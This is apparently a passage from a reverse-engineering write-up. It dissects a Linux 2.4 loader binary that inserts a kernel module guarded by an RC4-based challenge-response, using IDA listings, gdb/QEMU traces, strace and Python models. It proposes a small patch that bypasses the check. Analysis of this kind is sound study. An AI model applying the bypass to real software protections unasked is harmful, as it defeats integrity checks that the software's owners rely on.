0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 4010 83c8  ............@...
0000030: 0000 0000 0000 0000 0000 0000            ............
... matching up with the above struct module ...
size_of_struct: 0x0000003c      (0x0000)
next: NULL                      (0x0004)
name: 0xc8831590                (0x0008)
size: 0x00000596                (0x000c)
usecount: 0                     (0x0010)
flags: 0                        (0x0014)
nsyms: 0                        (0x0018)
ndeps: 0                        (0x001c)
syms: NULL                      (0x0020)
deps: NULL                      (0x0024)
refs: NULL                      (0x0028)
init: 0xc8831040                (0x002c)
cleanup: NULL                   (0x0030)
ex_table_start: NULL            (0x0034)
ex_table_end: NULL              (0x0038)
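The manual matching above can be double checked mechanically. As a sketch, assuming a 32-bit little-endian layout with 4 byte longs and pointers (which is what i386 gives us), Python's struct module can unpack the dumped header into the struct module fields. The hex string is the xxd output of /tmp/module_header retyped by hand, and the names FIELDS, LAYOUT and parse_module_header are just for this example.

```python
import struct

# Field names in declaration order, without the alpha-only gp member.
FIELDS = (
    "size_of_struct", "next", "name", "size", "usecount", "flags",
    "nsyms", "ndeps", "syms", "deps", "refs", "init", "cleanup",
    "ex_table_start", "ex_table_end",
)

# Little-endian: four unsigned words, one signed long (usecount), ten unsigned words.
LAYOUT = struct.Struct("<4Il10I")

HEADER_HEX = (
    "3c000000 00000000 901583c8 96050000 "
    "00000000 00000000 00000000 00000000 "
    "00000000 00000000 00000000 401083c8 "
    "00000000 00000000 00000000"
)


def parse_module_header(raw):
    """Map the raw header bytes onto the struct module field names."""
    return dict(zip(FIELDS, LAYOUT.unpack(raw)))


header = parse_module_header(bytes.fromhex(HEADER_HEX))
for name in FIELDS:
    print("%-15s 0x%08x" % (name + ":", header[name] & 0xffffffff))
```

The unpacked size field (0x596, or 1430) also lines up with the size passed to create_module in the strace output.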

So, our output in /tmp/module_text starts at 0xc883103c, and is 1430 bytes long. Disassembling the binary dump in /tmp/module_text, looking for the init function pointer that gets called:

[box] $ ndisasm -b 32 -o $((0xc883103c)) /tmp/module_text
...
C8831040  83EC18            sub esp,byte +0x18
C8831043  53                push ebx
C8831044  E8F7040000        call 0xc8831540
C8831049  8D5818            lea ebx,[eax+0x18]
C883104C  C7430400000000    mov dword [ebx+0x4],0x0
C8831053  C7401800000000    mov dword [eax+0x18],0x0
...

By combining the gdb stub functionality in qemu with a disassembler such as IDA Pro, we can disassemble and follow what happens when the init code is executed.

Testing our analysis against the init function by setting break points on:

Just to make sure we catch everything.. I don't expect 0xc053ffd0 to be hit, but it is a valid kernel address :)

Testing the theory out under gdb/qemu doesn't pan out quite as expected:

(gdb) break *0xc053ffd0
Breakpoint 4 at 0xc053ffd0
(gdb) break *0xc8831040
Breakpoint 5 at 0xc8831040
(gdb) c
Continuing.

... Run the loader program ...

Breakpoint 5, 0xc8831040 in ?? ()
(gdb) x/10i $eip
0xc8831040:     sub    $0x18,%esp
0xc8831043:     push   %ebx
0xc8831044:     call   0xc8831540
0xc8831049:     lea    0x18(%eax),%ebx
0xc883104c:     movl   $0x0,0x4(%ebx)
0xc8831053:     movl   $0x0,0x18(%eax)
0xc883105a:     mov    0xc0252024,%eax
0xc883105f:     inc    %eax
0xc8831060:     mov    %eax,0x8(%ebx)
0xc8831063:     call   0xc8831090
(gdb) i r ebx
ebx            0xc8831000       -930934784

Now that we're able to trace this code, we should work out what information would be desirable to make this process far easier:

Another couple of things we could try to help our reversing efforts:

[box] $ cat /proc/version
Linux version 2.4.31 (build@builder2) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Fri Aug 10 12:43:55 EEST 2007

After some research, it was determined that gcc version 2.95.4 20011002 is what ships with a default install of Debian 3.0r1. I only needed cd1 and cd2 from the set of CDs to install the required tools.

After performing a compile of the default kernel configuration shipped in 2.4.31 sans PCMCIA support, I used the 2pelf tool available here to generate the signatures off the .o files in the linux tree, then used the IDA tool sigmake to generate the signature information. (I love bash scripting to automate these tasks).

If needed, the signatures could be regenerated several times with different compilation parameters in order to increase success of signature matching.

Since it would be helpful to have a full kernel text image in IDA Pro, we can use the memsave function in QEMU to generate an appropriate memory dump. To get the most useful memory dump, I'll generate the dump when qemu has hit the breakpoint on the "qwink" init function.

The vmlinux file generated when I compiled the 2.4.31 kernel indicated that the kernel got loaded at 0xc0100000, so we'll dump from there to 0xd0000000… This actually turned out to be a bad idea, as IDA couldn't analyse such large files. After some experimentation and looking at the output of objdump -fp on the compiled vmlinux file, I dumped from 0xc0100000 to 0xc1000000.

(qemu) memsave 3222274048 15728640 d
*pause*
(qemu)

The first number is 0xc0100000 and the second is 0xc1000000 - 0xc0100000.
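Since the memsave command wants a decimal start address and a length rather than an end address, the conversion is easy to get wrong by hand. A tiny helper (the name is made up for this example) reproduces the numbers used above:

```python
def memsave_command(start, end, filename):
    """Build a QEMU monitor memsave line from a start and end address."""
    return "memsave %d %d %s" % (start, end - start, filename)


print(memsave_command(0xc0100000, 0xc1000000, "d"))
```

This prints the same line that was typed into the monitor: memsave 3222274048 15728640 d.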

After dumping the kernel memory to disk, loading it into IDA, and applying the signatures that were generated before, we see a lot of function names pop up. Sometimes they're correct, sometimes they don't appear to be, sometimes they don't find functions we find interesting, but in general they save us a lot of work :)

The init code is as follows from IDA:

seg001:C8831040 module_init_code:
seg001:C8831040                 sub     esp, 18h
seg001:C8831043                 push    ebx
seg001:C8831044                 call    GET_C8831550    ; eax = 0xc8831550
seg001:C8831049                 lea     ebx, [eax+18h]  ; ebx = eax + 0x18 = 0xc8831568, this is struct timer_list data
seg001:C883104C                 mov     dword ptr [ebx+4], 0 ; sets list.prev to null (offset 4 of struct timer_list)
seg001:C8831053                 mov     dword ptr [eax+18h], 0 ; sets list.next to null (offset 0 of struct timer_list)
seg001:C883105A                 mov     eax, ds:jiffies
seg001:C883105F                 inc     eax             ; schedules the code to be executed in one jiffie
seg001:C8831060                 mov     [ebx+8], eax    ; sets the scheduler expires
seg001:C8831063                 call    GET_C88310a0
seg001:C8831068                 mov     [ebx+10h], eax  ; function pointer used (execd_by_timer) below
seg001:C883106B                 mov     eax, 0FFFFE000h
seg001:C8831070                 and     eax, esp        ; get current
seg001:C8831072                 mov     [ebx+0Ch], eax  ; data pointer for call back. current task
seg001:C8831075                 add     esp, -0Ch       ; no idea what it's doing here. possibly aligning stack to paragraph boundary?
seg001:C8831078                 mov     eax, offset add_timer
seg001:C883107D                 push    ebx             ; push offset to struct timer_list data
seg001:C883107E                 call    eax ; add_timer
seg001:C8831080                 xor     eax, eax        ; return NULL
seg001:C8831082                 add     esp, 10h
seg001:C8831085                 pop     ebx
seg001:C8831086                 add     esp, 18h
seg001:C8831089                 retn

Having a look at the loader binary in IDA, we see:

Example: Loader: load_module_into_kernel
.text:08053DA8 load_module_into_kernel proc near       ; CODE XREF: sub_804DD20+25p
.text:08053DA8                                         ; sub_804F572+10Dp ...
.text:08053DA8
.text:08053DA8 constructed_image= dword ptr -24h
.text:08053DA8 roundup_size    = dword ptr -20h
.text:08053DA8 start_of_module_data= dword ptr -18h
.text:08053DA8 total_size      = dword ptr -14h
.text:08053DA8 kernel_modified_variable= dword ptr -10h
.text:08053DA8 var_C           = dword ptr -0Ch
.text:08053DA8 tv_usecs_challenge= dword ptr  8
.text:08053DA8
.text:08053DA8                 push    ebp
.text:08053DA9                 cld                     ; clear direction flag
.text:08053DAA                 mov     ebp, esp
.text:08053DAC                 push    edi
.text:08053DAD                 xor     eax, eax
.text:08053DAF                 push    esi
.text:08053DB0                 or      ecx, 0FFFFFFFFh
.text:08053DB3                 push    ebx
.text:08053DB4                 sub     esp, 18h
.text:08053DB7                 mov     [ebp+kernel_modified_variable], 0 ; initialise the variable written to by access_process_vm to 0
.text:08053DBE                 mov     edi, module_name
.text:08053DC4                 mov     edx, 10h
.text:08053DC9                 repne scasb
.text:08053DCB                 mov     ebx, ecx
.text:08053DCD                 mov     eax, 3Ch
.text:08053DD2                 not     ebx             ; embedded strlen()
.text:08053DD4                 call    sub_8053D95     ; round eax (0x3c) up to a multiple of edx (0x10)
.text:08053DD9                 mov     [ebp+roundup_size], eax ; save the calculation for later use
.text:08053DDC                 lea     edx, [eax+ebx+1360] ; calculate total size needed: rounded header + name length + 1360
.text:08053DE3                 push    edx             ; size
.text:08053DE4                 mov     [ebp+total_size], edx
.text:08053DE7                 call    _malloc         ; allocate the required space
.text:08053DEC                 mov     [ebp+constructed_image], eax ; save the results of malloc()
.text:08053DEF                 mov     ecx, [ebp+total_size]
.text:08053DF2                 cld                     ; clear direction flag
.text:08053DF3                 mov     edi, eax
.text:08053DF5                 xor     eax, eax        ; write nulls
.text:08053DF7                 rep stosb               ; embedded memset
.text:08053DF9                 push    510h            ; size_t
.text:08053DFE                 mov     edi, [ebp+constructed_image] ; get the allocated memory
.text:08053E01                 add     edi, [ebp+roundup_size] ; move past the module structure
.text:08053E04                 push    offset module_init_code ; void *
.text:08053E09                 lea     edx, [edi+510h] ; edx now points PAST the module_init_code and all that
.text:08053E0F                 push    edi             ; void *
.text:08053E10                 lea     esi, [edi+1360] ; esi = module name pointer
.text:08053E16                 mov     [ebp+start_of_module_data], edx
.text:08053E19                 call    _memcpy         ; copy the module_init_code (of length 0x510)
.text:08053E19                                         ; to the allocated memory
.text:08053E1E                 push    ebx             ; size_t. this is calculated previously from strlen(module_name)
.text:08053E1F                 push    module_name     ; void *
.text:08053E25                 push    esi             ; points to module name
.text:08053E26                 call    _memcpy         ; setup module name
.text:08053E2B                 push    [ebp+total_size] ; int
.text:08053E2E                 push    module_name     ; name
.text:08053E34                 call    create_module
.text:08053E39                 add     esp, 24h
.text:08053E3C                 cmp     eax, 0FFFFFFFFh ; eax contains base of the allocated kernel memory
.text:08053E3F                 jnz     short loc_8053E48
.text:08053E41                 push    offset aFailedToCreate ; "failed to create module"
.text:08053E46                 jmp     short loc_8053EC0
.text:08053E48 ; ---------------------------------------------------------------------------
.text:08053E48
.text:08053E48 loc_8053E48:                            ; CODE XREF: load_module_into_kernel+97j
.text:08053E48                 mov     ecx, [ebp+constructed_image]
.text:08053E4B                 mov     dword ptr [ecx], 3Ch ; set size of module header to 0x3c
.text:08053E51                 mov     ecx, [ebp+roundup_size]
.text:08053E54                 lea     edx, [eax+ecx]  ; edx = start of module code, in kernel space
.text:08053E57                 mov     ecx, [ebp+constructed_image]
.text:08053E5A                 lea     eax, [edx+1360] ; eax = end of module code, start of "qwink"
.text:08053E60                 mov     [ecx+2Ch], edx  ; set the init pointer (header offset 0x2c) to the start of the module code
.text:08053E63                 mov     edx, [ebp+tv_usecs_challenge] ; arg_0 = tv.tv_usecs ?
.text:08053E66                 mov     [ecx+8], eax    ; write the name pointer, points to end of module, "qwink"
.text:08053E69                 mov     eax, [ebp+total_size]
.text:08053E6C                 mov     [edi+510h], edx ; write challenge to kernel image (data section)
.text:08053E72                 mov     [ecx+0Ch], eax  ; write size of complete module to header
.text:08053E75                 mov     ecx, [ebp+start_of_module_data]
.text:08053E78                 mov     eax, kernel_ptr_c0105000
.text:08053E7D                 mov     [ecx+4], eax
.text:08053E80                 mov     eax, dword_8056A68 ; some mystical value
.text:08053E85                 mov     [ecx+8], eax
.text:08053E88                 mov     eax, dword_8056A6C ; 0x3f
.text:08053E8D                 mov     [ecx+0Ch], eax
.text:08053E90                 lea     eax, [ebp+kernel_modified_variable] ; get the address of the variable
.text:08053E93                 mov     [ecx+10h], eax  ; variable that is going to be written to
.text:08053E96                 call    alloc_rc4_t
.text:08053E9B                 push    [ebp+start_of_module_data]
.text:08053E9E                 mov     esi, eax
.text:08053EA0                 push    eax
.text:08053EA1                 call    rc4_init_key_encrypt ; (rc4_t, start_of_module_data)
.text:08053EA6                 push    [ebp+constructed_image] ; image
.text:08053EA9                 push    module_name     ; name
.text:08053EAF                 call    init_module
.text:08053EB4                 add     esp, 10h
.text:08053EB7                 test    eax, eax
.text:08053EB9                 jz      short loc_8053EC9
.text:08053EBB                 push    offset aFailedToLoadMo ; "failed to load module"
.text:08053EC0
.text:08053EC0 loc_8053EC0:                            ; CODE XREF: load_module_into_kernel+9Ej
.text:08053EC0                 call    _puts
.text:08053EC5                 xor     eax, eax
.text:08053EC7                 jmp     short loc_8053EFE
.text:08053EC9 ; ---------------------------------------------------------------------------
.text:08053EC9
.text:08053EC9 loc_8053EC9:                            ; CODE XREF: load_module_into_kernel+111j
.text:08053EC9                                         ; load_module_into_kernel+126_j
.text:08053EC9                 mov     eax, [ebp+kernel_modified_variable]
.text:08053ECC                 test    eax, eax
.text:08053ECE                 jz      short loc_8053EC9 ; while the variable hasn't been modified, loop. Ugh.
.text:08053ED0                 push    offset unk_8056960 ; not sure yet
.text:08053ED5                 xor     ebx, ebx
.text:08053ED7                 push    [ebp+tv_usecs_challenge] ; challenge
.text:08053EDA                 push    esi             ; rc4 structure, returned from rc4_init
.text:08053EDB                 call    check_challenge_response
.text:08053EE0                 add     esp, 0Ch
.text:08053EE3                 mov     edx, [ebp+kernel_modified_variable]
.text:08053EE6                 push    module_name     ; name
.text:08053EEC                 cmp     edx, eax        ; result from check_challenge_response
.text:08053EEE                 setz    bl              ; set return code if they're the same
.text:08053EF1                 call    delete_module
.text:08053EF6                 push    esi
.text:08053EF7                 call    free_rc4_t_tailcall
.text:08053EFC                 mov     eax, ebx        ; set return value (based on check_challenge_response)
.text:08053EFE
.text:08053EFE loc_8053EFE:                            ; CODE XREF: load_module_into_kernel+11Fj
.text:08053EFE                 lea     esp, [ebp-0Ch]
.text:08053F01                 pop     ebx
.text:08053F02                 pop     esi
.text:08053F03                 pop     edi
.text:08053F04                 pop     ebp
.text:08053F05                 retn
.text:08053F05 load_module_into_kernel endp
.text:08053F05
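
The size arithmetic at the top of load_module_into_kernel can be checked against the strace output further down. The sketch below restates it in Python, assuming sub_8053D95 rounds its first argument up to a multiple of the second (which is how its listing reads) and that ebx ends up holding strlen(module_name) + 1. The function names are made up for illustration.

```python
HEADER_SIZE = 0x3C   # value loaded into eax before the call to sub_8053D95
ALIGNMENT = 0x10     # value loaded into edx before the call
FIXED_PART = 1360    # constant from 'lea edx, [eax+ebx+1360]'


def round_up(value: int, alignment: int) -> int:
    """Same steps as sub_8053D95; alignment is assumed to be a power of two."""
    mask = alignment - 1
    if (value & mask) == 0:
        return value
    return (value | mask) + 1


def total_image_size(module_name: bytes) -> int:
    """Rounded header + name length (including the NUL) + fixed part."""
    name_len = len(module_name) + 1  # repne scasb / not ecx counts the terminator
    return round_up(HEADER_SIZE, ALIGNMENT) + name_len + FIXED_PART


print(total_image_size(b"qwink"))  # 1430
```

For "qwink" this gives 0x40 + 6 + 1360 = 1430, which is the size passed to create_module in the strace output.
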
Example: Loader: check_challenge_response
.text:08053CEA check_challenge_response proc near      ; CODE XREF: load_module_into_kernel+133p
.text:08053CEA
.text:08053CEA local_rc4_structure= dword ptr -14h
.text:08053CEA challenge_copy  = dword ptr -10h
.text:08053CEA var_C           = dword ptr -0Ch
.text:08053CEA rc4_t           = dword ptr  8
.text:08053CEA challenge       = dword ptr  0Ch
.text:08053CEA unknown_data    = dword ptr  10h
.text:08053CEA
.text:08053CEA                 push    ebp
.text:08053CEB                 mov     ebp, esp
.text:08053CED                 push    edi
.text:08053CEE                 push    esi
.text:08053CEF                 xor     esi, esi
.text:08053CF1                 push    ebx
.text:08053CF2                 push    ecx
.text:08053CF3                 push    ecx
.text:08053CF4                 mov     edi, [ebp+rc4_t]
.text:08053CF7                 mov     eax, [ebp+challenge]
.text:08053CFA                 push    edi
.text:08053CFB                 mov     [ebp+challenge_copy], eax
.text:08053CFE                 call    rc4_dup_struct
.text:08053D03                 mov     [ebp+local_rc4_structure], eax ; duplicated structure
.text:08053D06                 mov     eax, [ebp+unknown_data]
.text:08053D09                 push    dword ptr [eax+100h] ; offset in 256 bytes
.text:08053D0F                 push    edi             ; rc4 structure passed in
.text:08053D10                 call    rc4_set_key
.text:08053D15                 add     esp, 0Ch
.text:08053D18
.text:08053D18 loc_8053D18:                            ; CODE XREF: check_challenge_response+91j
.text:08053D18                 push    edi
.text:08053D19                 call    rc4_get_byte
.text:08053D1E                 mov     edx, [ebp+local_rc4_structure]
.text:08053D21                 mov     bl, al          ; gets a byte from the rc4 structure which was passed in (and initialised later on)
.text:08053D23                 mov     ecx, esi        ; esi is a loop counter
.text:08053D25                 and     ecx, 3          ; byte index (0-3) into challenge_copy
.text:08053D28                 movzx   eax, byte ptr [edx+esi] ; index into the duplicated structure
.text:08053D2C                 mov     edx, [ebp+unknown_data]
.text:08053D2F                 movzx   eax, byte ptr [edx+eax] ; get a byte of the unknown data
.text:08053D33                 pop     edx             ; discard the rc4_get_byte argument pushed above
.text:08053D34                 mov     edx, ebx        ; get the byte that was generated via rc4_get_byte
.text:08053D36                 and     edx, 3          ; perform a switch on the low 2 bits
.text:08053D39                 cmp     edx, 1
.text:08053D3C                 jz      short loc_8053D5A
.text:08053D3E                 jg      short loc_8053D46
.text:08053D40                 test    edx, edx
.text:08053D42                 jz      short loc_8053D52
.text:08053D44                 jmp     short loc_8053D74
.text:08053D46 ; ---------------------------------------------------------------------------
.text:08053D46
.text:08053D46 loc_8053D46:                            ; CODE XREF: check_challenge_response+54j
.text:08053D46                 cmp     edx, 2
.text:08053D49                 jz      short loc_8053D62
.text:08053D4B                 cmp     edx, 3
.text:08053D4E                 jz      short loc_8053D6A
.text:08053D50                 jmp     short loc_8053D74
.text:08053D52 ; ---------------------------------------------------------------------------
.text:08053D52
.text:08053D52 loc_8053D52:                            ; CODE XREF: check_challenge_response+58j
.text:08053D52                 xor     al, bl
.text:08053D54                 add     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D58                 jmp     short loc_8053D74
.text:08053D5A ; ---------------------------------------------------------------------------
.text:08053D5A
.text:08053D5A loc_8053D5A:                            ; CODE XREF: check_challenge_response+52j
.text:08053D5A                 add     al, bl
.text:08053D5C                 xor     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D60                 jmp     short loc_8053D74
.text:08053D62 ; ---------------------------------------------------------------------------
.text:08053D62
.text:08053D62 loc_8053D62:                            ; CODE XREF: check_challenge_response+5Fj
.text:08053D62                 xor     bl, byte ptr [ebp+ecx+challenge_copy]
.text:08053D66                 add     al, bl
.text:08053D68                 jmp     short loc_8053D70
.text:08053D6A ; ---------------------------------------------------------------------------
.text:08053D6A
.text:08053D6A loc_8053D6A:                            ; CODE XREF: check_challenge_response+64j
.text:08053D6A                 add     al, byte ptr [ebp+ecx+challenge_copy]
.text:08053D6E                 xor     al, bl
.text:08053D70
.text:08053D70 loc_8053D70:                            ; CODE XREF: check_challenge_response+7Ej
.text:08053D70                 mov     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D74
.text:08053D74 loc_8053D74:                            ; CODE XREF: check_challenge_response+5Aj
.text:08053D74                                         ; check_challenge_response+66j ...
.text:08053D74                 inc     esi
.text:08053D75                 cmp     esi, 100h
.text:08053D7B                 jnz     short loc_8053D18
.text:08053D7D                 push    [ebp+local_rc4_structure]
.text:08053D80                 call    free_rc4_t_tailcall
.text:08053D85                 mov     eax, [ebp+challenge_copy]
.text:08053D88                 lea     esp, [ebp-0Ch]
.text:08053D8B                 pop     ebx
.text:08053D8C                 or      eax, 80000000h  ; ret |= 0x80000000l
.text:08053D91                 pop     esi
.text:08053D92                 pop     edi
.text:08053D93                 pop     ebp
.text:08053D94                 retn
.text:08053D94 check_challenge_response endp
.text:08053D94
.text:08053D95
.text:08053D95 ; =============== S U B R O U T I N E =======================================
.text:08053D95
.text:08053D95 ; Attributes: bp-based frame
.text:08053D95
.text:08053D95 sub_8053D95     proc near               ; CODE XREF: load_module_into_kernel+2Cp
.text:08053D95                 push    ebp
.text:08053D96                 dec     edx             ; 16 -> 15
.text:08053D97                 test    eax, edx        ; eax = 0x3c
.text:08053D99                 mov     ebp, esp
.text:08053D9B                 mov     ecx, eax
.text:08053D9D                 jz      short loc_8053DA4
.text:08053D9F                 or      edx, eax
.text:08053DA1                 lea     ecx, [edx+1]
.text:08053DA4
.text:08053DA4 loc_8053DA4:                            ; CODE XREF: sub_8053D95+8j
.text:08053DA4                 pop     ebp
.text:08053DA5                 mov     eax, ecx
.text:08053DA7                 retn
.text:08053DA7 sub_8053D95     endp
.text:08053DA7
.text:08053DA8
.text:08053DA8 ; =============== S U B R O U T I N E =======================================
.text:08053DA8
.text:08053DA8 ; Attributes: bp-based frame
.text:08053DA8
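
The loop in check_challenge_response is easier to follow when written out in a high-level language. The following is a Python model of the 256 rounds as they read in the listing. It is a sketch only: the keystream bytes, the duplicated RC4 state and the 256-byte table are passed in as plain byte strings because rc4_get_byte, rc4_dup_struct and the contents of unk_8056960 are not shown here, and the function name is hypothetical.

```python
def mix_challenge(challenge: int, keystream: bytes, dup_state: bytes, table: bytes) -> int:
    """Model of the 256-round loop in check_challenge_response.

    challenge -- 32-bit value (tv_usecs_challenge in the caller)
    keystream -- 256 bytes standing in for successive rc4_get_byte() results
    dup_state -- first 256 bytes of the structure returned by rc4_dup_struct
    table     -- first 256 bytes of unknown_data
    """
    c = bytearray(challenge.to_bytes(4, "little"))  # challenge_copy, byte-addressed
    for i in range(0x100):
        bl = keystream[i]
        idx = i & 3                 # and ecx, 3
        al = table[dup_state[i]]    # the two movzx lookups
        op = bl & 3                 # switch on the low 2 bits
        if op == 0:
            c[idx] = (c[idx] + (al ^ bl)) & 0xFF
        elif op == 1:
            c[idx] ^= (al + bl) & 0xFF
        elif op == 2:
            c[idx] = (al + (bl ^ c[idx])) & 0xFF
        else:
            c[idx] = ((al + c[idx]) & 0xFF) ^ bl
    return int.from_bytes(c, "little") | 0x80000000
```

Whatever the inputs, the top bit of the result is always set, matching the final or eax, 80000000h.
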
Example: Loader: rc4_init_key_encrypt
.text:08053BFD rc4_init_key_encrypt proc near          ; CODE XREF: load_module_into_kernel+F9p
.text:08053BFD
.text:08053BFD var_8           = dword ptr -8
.text:08053BFD rc4_t           = dword ptr  8
.text:08053BFD start_of_module_data= dword ptr  0Ch
.text:08053BFD
.text:08053BFD                 push    ebp
.text:08053BFE                 mov     ebp, esp
.text:08053C00                 push    esi
.text:08053C01                 mov     esi, [ebp+rc4_t]
.text:08053C04                 push    ebx
.text:08053C05                 mov     ebx, [ebp+start_of_module_data]
.text:08053C08                 push    esi
.text:08053C09                 call    init_rc4_t
.text:08053C0E                 push    dword ptr [ebx] ; push the encryption key
.text:08053C10                 add     ebx, 4          ; move the data along
.text:08053C13                 push    esi             ; push the rc4_t context
.text:08053C14                 call    rc4_set_key
.text:08053C19                 push    1000            ; length
.text:08053C1E                 push    esi             ; rc4 structure
.text:08053C1F                 call    rc4_prevent_weak_bytes
.text:08053C24                 push    10h             ; size
.text:08053C26                 push    ebx             ; data
.text:08053C27                 push    esi             ; rc4 structure
.text:08053C28                 call    rc4_crypt       ; encrypts 16 bytes that go to the kernel module
.text:08053C2D                 lea     esp, [ebp-8]
.text:08053C30                 pop     ebx
.text:08053C31                 pop     esi
.text:08053C32                 pop     ebp
.text:08053C33                 retn
.text:08053C33 rc4_init_key_encrypt endp
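
As a rough model of what rc4_init_key_encrypt does, here is a Python sketch. It assumes the rc4_* routines implement textbook RC4, that the key is the first dword of the module data used as four bytes in memory order, and that rc4_prevent_weak_bytes simply discards the requested number of keystream bytes. None of these are confirmed by the listings above, and all function names are hypothetical.

```python
def rc4_keystream(key: bytes):
    """Textbook RC4: key scheduling, then an endless keystream generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4_crypt(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """XOR data with the keystream after discarding 'drop' initial bytes."""
    stream = rc4_keystream(key)
    for _ in range(drop):
        next(stream)
    return bytes(b ^ next(stream) for b in data)


def encrypt_module_block(module_data: bytes) -> bytes:
    """Key = first 4 bytes (assumed), drop 1000, encrypt the next 16 bytes."""
    key = module_data[:4]
    return rc4_crypt(key, module_data[4:20], drop=1000)
```

Since RC4 is symmetric, calling rc4_crypt again with the same key and drop value recovers the original 16 bytes.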

Overall, it looks like the loader binary is trying to ensure it is running on the same kernel the module was written for, because the module uses hard-coded offsets into kernel data. I was disappointed that the module the loader binary inserts didn't appear to be malicious.

Bypassing this somewhat artificial restriction is fairly easy. The code written earlier to hook create_module and init_module can be modified to:

xor eax, eax
inc eax
ret

to avoid this restriction. I haven't tested this, but it should work :p
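
For reference, those three instructions assemble to four bytes in 32-bit mode. The sketch below writes them over a chosen offset in an in-memory copy of some code. It is only an illustration: the helper name is hypothetical, and where the stub should actually be placed depends on the hooking code described earlier.

```python
# xor eax, eax ; inc eax ; ret  (32-bit x86 encoding)
RETURN_ONE_STUB = bytes([0x31, 0xC0, 0x40, 0xC3])


def patch_return_one(image: bytearray, offset: int) -> None:
    """Overwrite the code at 'offset' so that it returns 1 immediately."""
    if offset < 0 or offset + len(RETURN_ONE_STUB) > len(image):
        raise ValueError("stub does not fit inside the image")
    image[offset:offset + len(RETURN_ONE_STUB)] = RETURN_ONE_STUB


# Example on a dummy buffer of NOPs (0x90); the offset is arbitrary.
code = bytearray(b"\x90" * 8)
patch_return_one(code, 2)
```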

Continuing the analysis of loader

Before we can continue the analysis of the fileman binary, we still need to get the loader binary running. Running it under strace reveals the current issue with loader:

[box] # LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
execve("./loader", ["./loader"], [/* 15 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
...
[pid  1727] rt_sigaction(SIGSEGV, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGILL, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGABRT, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGBUS, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] gettimeofday({1189098093, 745332}, NULL) = 0
[pid  1727] create_module("qwink", 1430) = 0xc8833000
[pid  1727] init_module(0x80553fc, 134587376, umovestr: Input/output error
0x7c) = 0
[pid  1726] waitpid(1727, Process 1726 suspended
 <unfinished ...>
[pid  1727] delete_module("qwink")      = 0
...
[pid  1727] open("/dev/panics", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid  1727] open("/proc/cmdline", O_RDONLY) = 3
[pid  1727] fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
[pid  1727] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40170000
[pid  1727] read(3, "root=/dev/hda1 ro single\n", 4096) = 25
[pid  1727] close(3)                    = 0
[pid  1727] munmap(0x40170000, 4096)    = 0
[pid  1727] exit_group(1)               = ?

It appears some functionality that is provided elsewhere needs to be initialised first.

Looking at loader in IDA (cross-referencing /proc/cmdline) shows that /proc/cmdline must contain MBR= followed by a value that matches %x, i.e. a hexadecimal number.

.text:0804DBD4                 push    offset name     ; "/proc/cmdline"
.text:0804DBD9                 call    _fopen          ; open the file, read only
.text:0804DBDE                 pop     ebx
.text:0804DBDF                 mov     esi, eax
.text:0804DBE1                 test    esi, esi
.text:0804DBE3                 pop     eax
.text:0804DBE4                 jz      short loc_804DC34 ; if opening the file failed, jump down to exit(1)
.text:0804DBE6                 push    esi             ; FILE *
.text:0804DBE7                 lea     ebx, [ebp+var_408]
.text:0804DBED                 push    1024            ; int
.text:0804DBF2                 push    ebx             ; char *
.text:0804DBF3                 call    _fgets          ; read in 0x400 bytes
.text:0804DBF8                 push    esi             ; FILE *
.text:0804DBF9                 call    _fclose
.text:0804DBFE                 push    offset aMbr     ; "MBR="
.text:0804DC03                 push    ebx             ; char *
.text:0804DC04                 call    _strstr         ; look for MBR= in the string
.text:0804DC09                 add     esp, 18h
.text:0804DC0C                 test    eax, eax
.text:0804DC0E                 mov     edx, eax
.text:0804DC10                 jz      short loc_804DC34 ; don't find it, exit out
.text:0804DC12                 mov     [ebp+var_40C], 0 ; initialise the number read in
.text:0804DC1C                 lea     eax, [ebp+var_40C] ; load the address in
.text:0804DC22                 push    eax
.text:0804DC23                 push    offset aMbrX    ; "MBR=%x"
.text:0804DC28                 push    edx             ; char *
.text:0804DC29                 call    _sscanf         ; parse the string
.text:0804DC2E                 add     esp, 0Ch
.text:0804DC31                 dec     eax
.text:0804DC32                 jz      short loc_804DC3B
.text:0804DC34
.text:0804DC34 loc_804DC34:                            ; CODE XREF: sub_804DBC4+20j
.text:0804DC34                                         ; sub_804DBC4+4Cj
.text:0804DC34                 push    1               ; status
.text:0804DC36                 call    _exit
.text:0804DC3B ; ---------------------------------------------

Looking up information on master boot records (MBR) indicates that the partition table within the MBR starts at offset 0x1BE. However, looking at where the code is called, there is a comparison to see if the value is above a certain size. Restarting with an updated kernel command line containing MBR=0 lets the binary run and listen on a network socket.
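
The check in the listing above boils down to a strstr for "MBR=" followed by an sscanf with "MBR=%x" that must convert exactly one value. A small Python approximation of that logic is given below. The function name is made up, and the regular expression only covers the common cases of %x (hex digits with an optional 0x prefix), not every corner of sscanf.

```python
import re
from typing import Optional

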